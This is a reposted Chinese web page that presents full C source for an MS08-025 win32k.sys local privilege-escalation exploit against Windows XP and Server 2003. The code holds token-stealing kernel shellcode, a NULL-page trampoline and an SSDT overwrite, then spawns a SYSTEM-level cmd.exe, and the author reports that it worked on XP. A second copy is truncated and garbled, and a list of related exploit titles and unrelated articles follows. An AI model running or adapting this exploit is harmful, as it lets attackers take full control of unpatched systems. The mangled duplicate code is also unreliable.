MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
来源:互联网 发布:主宰西游坐骑数据 编辑:程序博客网 时间:2024/06/03 17:49
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
printf("%s:%x/n", msg, GetLastError());
ExitProcess(0);
}
ZWVDMCONTROL ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;
_declspec(naked) int ShellCode()
{
if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
nop
nop
nop
nop
nop
nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]
mov esi,[eax+0x220]
mov eax,esi
searchXp:
mov eax,[eax+0x88]
sub eax,0x88
mov edx,[eax+0x84]
cmp edx,0x4 // Find System Process
jne searchXp
mov eax,[eax+0xc8] // 获取system进程的token
mov [esi+0xc8],eax // 修改当前进程的token
ret 8
}
}
if ( OsVersionInfo.dwMinorVersion == 2 ) {
__asm {
nop
nop
nop
nop
nop
nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]
mov esi,[eax+0x220]
mov eax,esi
search2003:
mov eax,[eax+0x98]
sub eax,0x98
mov edx,[eax+0x94]
cmp edx,0x4 // Find System Process
jne search2003
mov eax,[eax+0xd8] // 获取system进程的token
mov [esi+0xd8],eax // 修改当前进程的token
ret 8
}
}
}
void InitTrampoline()
{
PNTALLOCATE NtAllocateVirtualMemory;
LPVOID addr = (LPVOID)3;
DWORD dwShellSize=0x1000;
unsigned char trampoline[]="/x68/x00/x00/x00 /x00" //push 0x0
"/xc3"; // retn
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle ("ntdll.dll"),"NtAllocateVirtua lMemory");
if( !NtAllocateVirtualMemory )
exit(0);
NtAllocateVirtualMemory( (HANDLE)-1,
&addr,
0,
&dwShellSize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP _DOWN,
PAGE_EXECUTE_READWRITE );
if( (PULONG)addr )
{
printf("/n[++] Error Allocating memory/n");
exit(0);
}
*(PULONG*)(trampoline+1)= (PULONG)ShellCode;
memcpy(NULL,trampoline,sizeof (trampoline)-1);
}
int Callback_Overview()
{
printf("/n");
printf("====================== ============================== ================= /n");
printf("/t/tMicrosoft Windows XP SP2 - MS08-025 - /n");
printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit /n");
printf("====================== ============================== ================= /n");
printf("+ References:/n");
printf(" http://www.microsoft.com /technet/security/bulletin /ms08-025.mspx/n");
printf(" http://hi.baidu.com/vessial/n/n");
return 1;
}
void GetFunction()
{
HANDLE hNtdll,hNtos;
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed./n");
ZwVdmControl = (ZWVDMCONTROL)GetProcAddress (hNtdll, "ZwVdmControl");
if(ZwVdmControl == NULL)
ErrorQuit("GetProcAddress failed./n");
FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{
//PULONG PntVdmControl=0x805F0DB0;
char* PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTa lbe)+0x10c*4获得
STARTUPINFOA stStartup;
PROCESS_INFORMATION pi;
Callback_Overview();
GetFunction();
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSi ze = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system/n" );
ExitProcess( 0 );
}
//Get Operatiny System Version
InitTrampoline();
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
printf("/n[+] Executing Shellcode.../n");
ZwVdmControl(0, NULL);
GetStartupInfo( &stStartup );
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi ); //此时创建的cmd.exe是SYSTEM权限
printf("[+] Exiting.../n");
return TRUE;
}
我在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限
另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
printf("%s:%x/n", msg, GetLastError());
ExitProcess(0);
}
ZWVDMCONTROL ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;
_declspec(naked) int ShellCode()
{
if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
nop
nop
nop
nop
nop
nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]
mov esi,[eax+0x220]
mov eax,esi
searchXp:
mov eax,[eax+0x88]
sub eax,0x88
mov edx,[eax+0x84]
cmp edx,0x4 // Find System Process
jne searchXp
mov eax,[eax+0xc8] // 获取system进程的token
mov [esi+0xc8],eax // 修改当前进程的token
ret 8
}
}
if ( OsVersionInfo.dwMinorVersion == 2 ) {
__asm {
nop
nop
nop
nop
nop
nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
Mov eax,[eax]
mov esi,[eax+0x220]
mov eax,esi
search2003:
mov eax,[eax+0x98]
sub eax,0x98
mov edx,[eax+0x94]
cmp edx,0x4 // Find System Process
jne search2003
mov eax,[eax+0xd8] // 获取system进程的token
mov [esi+0xd8],eax // 修改当前进程的token
ret 8
}
}
}
void InitTrampoline()
{
PNTALLOCATE NtAllocateVirtualMemory;
LPVOID addr = (LPVOID)3;
DWORD dwShellSize=0x1000;
unsigned char trampoline[]="/x68/x00/x00/x00
"/xc3"; // retn
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle
if( !NtAllocateVirtualMemory )
exit(0);
NtAllocateVirtualMemory( (HANDLE)-1,
&addr,
0,
&dwShellSize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP
PAGE_EXECUTE_READWRITE );
if( (PULONG)addr )
{
printf("/n[++] Error Allocating memory/n");
exit(0);
}
*(PULONG*)(trampoline+1)=
memcpy(NULL,trampoline,sizeof
}
int Callback_Overview()
{
printf("/n");
printf("======================
printf("/t/tMicrosoft Windows XP SP2 - MS08-025 - /n");
printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit /n");
printf("======================
printf("+ References:/n");
printf(" http://www.microsoft.com
printf(" http://hi.baidu.com/vessial/n/n");
return 1;
}
void GetFunction()
{
HANDLE hNtdll,hNtos;
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed./n");
ZwVdmControl = (ZWVDMCONTROL)GetProcAddress
if(ZwVdmControl == NULL)
ErrorQuit("GetProcAddress failed./n");
FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{
//PULONG PntVdmControl=0x805F0DB0;
char* PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTa
STARTUPINFOA stStartup;
PROCESS_INFORMATION pi;
Callback_Overview();
GetFunction();
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSi
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system/n" );
ExitProcess( 0 );
}
//Get Operatiny System Version
InitTrampoline();
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
printf("/n[+] Executing Shellcode.../n");
ZwVdmControl(0, NULL);
GetStartupInfo( &stStartup );
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi ); //此时创建的cmd.exe是SYSTEM权限
printf("[+] Exiting.../n");
return TRUE;
}
我在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit2
- MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- MS Windows GDI Local Privilege Escalation Exploit
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
- Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit
- Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
- QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)
- MS08-066 Microsoft Ancillary Function Driver Elevation of Privilege exploit
- Basic Linux Privilege Escalation
- Basic Linux Privilege Escalation
- BASIC WINDOWS PRIVILEGE ESCALATION
- Basic Linux Privilege Escalation
- hwclock(8) SUID privilege escalation
- C#上传图片并按比例生成缩略图
- 如何投影一个纹理 (翻译:心蓝 潘李亮)
- 经典进程同步问题
- OpenGL自动计算纹理坐标( By 董士崇 jerrydong@tom.com)
- OpenGL蒙板(转 Phil.Z's Program Blog)
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- epollEPOLL为我们带来了什么(转载)
- 虚拟机挂载U盘 命令
- OpenGL中蒙板缓冲区的妙用(转)
- windows server 2003对上传文件有大小限制
- OpenGL中蒙板缓冲区的妙用
- 用OpenGL实现纹理自动生长(蒋立华,秦雪,刘晓东,刘归荣)
- 使用Birt创建含有子报表的报表
- sqlserver2000中实现差集操作